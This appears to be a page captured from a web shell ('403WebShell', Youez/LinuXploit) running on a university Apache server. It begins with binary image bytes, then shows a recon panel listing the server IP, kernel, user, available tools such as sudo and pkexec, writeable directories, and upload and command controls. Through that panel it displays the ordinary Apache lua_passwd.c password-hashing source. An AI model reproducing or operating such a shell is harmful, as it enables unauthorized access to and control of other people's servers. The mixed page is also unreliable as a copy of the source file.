RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð �PNG  ��� IHDR���0���0����`n���� cHRM��z&��������������u0���`��:���p��Q<���bKGD�������������tIME� 6���� AIDATX��]pU����{��{�G�n$$@ -�-jВAک��P��1O���j��:cU|hg�}�C�ʋU�:�A A�����|$$$������}�^}8i *�د�?w�9gݵ��:{��F"��&��4� �@��@q_����Ow��9<<|�ԩ�;w���"�#GV�^}Ճ7�|s˖-{��|��G�-[��R�Q�aőTR)� �2!�e�63��X�U������{��Z�m۶�^}�5����}����v�퟇R��J�J,�$� B�$Ф")�i��D�9+䜆B.�qf�үÇoذaժU�i>��so����a^���۷����3�<�ꫯnݺ��"���\���gn0�h��B�i� hR��,W*�e�65��LS�ر�0ēO>���755���ι@O?��ҥK������:::����1��X�9S�%�'�I���$��Sg�ڥ3'zF/� ��Z�8ES6WZ#�. �\��P�R�2����-[�,_�|�`�j�Xl6M���b�Z�* �jҟ0��҉B""� y22r�ܹ�CG�;���{7nn��ma���������2S���� <��x�⡡�|p.Pw��x��y�C�=��O� ��CB}�ӵ����?�wq`8�e����{+Չɱ�\{&� LL������vww��]��?q��Y�������P(���vuu9���S?w���ݻ�v<���mш ��D�DR&�j�X�����y񪂬�>���dyg�7��b��s�p��E���BDR� t����������=w�\�[;:[&._�Dlڸv�]�� u�驚�/Y�a�����d�%��*)1� �V\G���[F]����X���i����J:z�N�9�?xϭ+X�V|���U�n� �g���hҜ�b�aҢ ^��j�f�ZV�K��w.�ؾp�}{� �/e��{O�o�����R�8���i� !jB`�3n;Mw.=7�S�'��F�y W��x�}LXNfz���� �b�p�b�bq~�����s�4�H�2��q^�r�� n���\aFf4�����n�c��Q�n�X�,����ӑҤd5DDDd 9'd��,�l��.���)?��������#}C�k����ܖq����m�a��y��8D���,K)�I�$I�8NE�aH)�|�VCDƘ��DF0D@M �"3�+�����Kcú��+n}��-�k:W�K������3ƄRʌ��m۞��q�9WJ���d�0�, �8��ٶ�⦈B�h���䩡�eDCj&$ �1�Y��\�>{~`�M����ͷt�#?VZ'@D²l"�,+�ɤc0�r��R*��X��n�_kMD�1"""ι�:%X��� $�b:i�b4 �X<�/"r�����[Vo��T��0V�i���sΓ$IG���4M�c �R�eq��QS�+5{�{�,��a"� �D�2�CҐ(I`CS�s�ʥ�R&�p�����۴(�N���e�sq�Ғ|%�����k�=�0S3@�`�i9�K��Պ�0T�Y��ؼD*��DE��2�gO�bŷrY����z�T��R�҉҆SX�Tϑ����/�Zi�eL��X��jdx䏿�eَ ���7��П"?�����0y����<��R�N8�\X9ӥx ��^�L�l�ކ��u����/���Q�B�^p�f��\3��]�INƑ�L�"--�r�! 8?���Rp~����v��|�M��$����_M �����GgF�/U�^�^p�Dk�ٲ�vM� ����L$�eGʓ01*���Two��f��#���ޱ��7��!5rdy"D��V���\ט�� [y�f ���@���Um����2w\�fg_򯯃z�y���v|`$_ow402�|���c��Zt��J��Yw��݌�b8+L����R�t߉O�xS���'�L��`/lY�� ���Z;f�nX���f��$�<���Ϩ�J��z"�y��%�qzz��(B��Y�@D�)�uS���<�\.[�����*T(�8v�̗����rrr2I�� N5w����^k=�}�:�S�yӌ��ً+�����NY碧f����0)��h. �R����4�Ա�>�X,:����c�0�0 �Rn6���mii�MW*�j��i�I�0�,ˊ��� È�8���j�$I �hkk �`||�B!b��l6�8Ncc��U��<���1f�&"FQdYV�B�b���j3�>� !��j>���g���g��RD����8���r�08�׵u�7��]3������~�,b�P���%tEXtdate:create�2025-02-07T10:02:54+00:00� t����%tEXtdate:modify�2025-02-07T10:02:54+00:00�P�6���(tEXtdate:timestamp�2025-02-07T10:02:54+00:00�E������IEND�B`� 403WebShell
403Webshell
Server IP : 128.227.220.250  /  Your IP : 216.73.216.35
Web Server : Apache/2.4.64 (Unix) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux dumont.ece.ufl.edu 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : daemon ( 2)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/source/current/httpd-2.4.57/modules/lua/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /opt/source/current/httpd-2.4.57/modules/lua/lua_passwd.c
/* Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.
 * The ASF licenses this file to You under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with
 * the License.  You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include "lua_passwd.h"
#include "apr_strings.h"
#include "apr_errno.h"

#if APR_HAVE_STDIO_H
#include <stdio.h>
#endif

#include "apr_md5.h"
#include "apr_sha1.h"

#if APR_HAVE_TIME_H
#include <time.h>
#endif
#if APR_HAVE_CRYPT_H
#include <crypt.h>
#endif
#if APR_HAVE_STDLIB_H
#include <stdlib.h>
#endif
#if APR_HAVE_STRING_H
#include <string.h>
#endif
#if APR_HAVE_UNISTD_H
#include <unistd.h>
#endif
#if APR_HAVE_IO_H
#include <io.h>
#endif

static int generate_salt(char *s, size_t size, const char **errstr,
                         apr_pool_t *pool)
{
    unsigned char rnd[32];
    static const char itoa64[] =
        "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    apr_size_t n;
    unsigned int val = 0, bits = 0;
    apr_status_t rv;

    n = (size * 6 + 7)/8;
    if (n > sizeof(rnd)) {
        *errstr = apr_psprintf(pool, "generate_salt(): BUG: Buffer too small");
        return ERR_RANDOM;
    }
    rv = apr_generate_random_bytes(rnd, n);
    if (rv) {
        *errstr = apr_psprintf(pool, "Unable to generate random bytes: %pm",
                               &rv);
        return ERR_RANDOM;
    }
    n = 0;
    while (size > 0) {
        if (bits < 6) {
            val |= (rnd[n++] << bits);
            bits += 8;
        }
        *s++ = itoa64[val & 0x3f];
        size--;
        val >>= 6;
        bits -= 6;
   }
   *s = '\0';
   return 0;
}

/*
 * Make a password record from the given information.  A zero return
 * indicates success; on failure, ctx->errstr points to the error message.
 */
int mk_password_hash(passwd_ctx *ctx)
{
    char *pw;
    char salt[16];
    apr_status_t rv;
    int ret = 0;
#if CRYPT_ALGO_SUPPORTED
    char *cbuf;
#endif

    pw = ctx->passwd;
    switch (ctx->alg) {
    case ALG_APSHA:
        /* XXX out >= 28 + strlen(sha1) chars - fixed len SHA */
        apr_sha1_base64(pw, strlen(pw), ctx->out);
        break;

    case ALG_APMD5:
        ret = generate_salt(salt, 8, &ctx->errstr, ctx->pool);
        if (ret != 0) {
            ret = ERR_GENERAL;
            break;
        }
        rv = apr_md5_encode(pw, salt, ctx->out, ctx->out_len);
        if (rv != APR_SUCCESS) {
            ctx->errstr = apr_psprintf(ctx->pool,
                                       "could not encode password: %pm", &rv);
            ret = ERR_GENERAL;
        }
        break;

#if CRYPT_ALGO_SUPPORTED
    case ALG_CRYPT:
        ret = generate_salt(salt, 8, &ctx->errstr, ctx->pool);
        if (ret != 0)
            break;
        cbuf = crypt(pw, salt);
        if (cbuf == NULL) {
            rv = APR_FROM_OS_ERROR(errno);
            ctx->errstr = apr_psprintf(ctx->pool, "crypt() failed: %pm", &rv);
            ret = ERR_PWMISMATCH;
            break;
        }

        apr_cpystrn(ctx->out, cbuf, ctx->out_len - 1);
        if (strlen(pw) > 8) {
            char *truncpw = apr_pstrdup(ctx->pool, pw);
            truncpw[8] = '\0';
            if (!strcmp(ctx->out, crypt(truncpw, salt))) {
                ctx->errstr = apr_psprintf(ctx->pool,
                                           "Warning: Password truncated to 8 "
                                           "characters by CRYPT algorithm.");
            }
            memset(truncpw, '\0', strlen(pw));
        }
        break;
#endif /* CRYPT_ALGO_SUPPORTED */

#if BCRYPT_ALGO_SUPPORTED
    case ALG_BCRYPT:
        rv = apr_generate_random_bytes((unsigned char*)salt, 16);
        if (rv != APR_SUCCESS) {
            ctx->errstr = apr_psprintf(ctx->pool, "Unable to generate random "
                                       "bytes: %pm", &rv);
            ret = ERR_RANDOM;
            break;
        }

        if (ctx->cost == 0)
            ctx->cost = BCRYPT_DEFAULT_COST;
        rv = apr_bcrypt_encode(pw, ctx->cost, (unsigned char*)salt, 16,
                               ctx->out, ctx->out_len);
        if (rv != APR_SUCCESS) {
            ctx->errstr = apr_psprintf(ctx->pool, "Unable to encode with "
                                       "bcrypt: %pm", &rv);
            ret = ERR_PWMISMATCH;
            break;
        }
        break;
#endif /* BCRYPT_ALGO_SUPPORTED */

    default:
        ctx->errstr = apr_psprintf(ctx->pool,
                                  "mk_password_hash(): unsupported algorithm %d",
                                  ctx->alg);
        ret = ERR_GENERAL;
    }
    memset(pw, '\0', strlen(pw));
    return ret;
}

Youez - 2016 - github.com/yon3zu
LinuXploit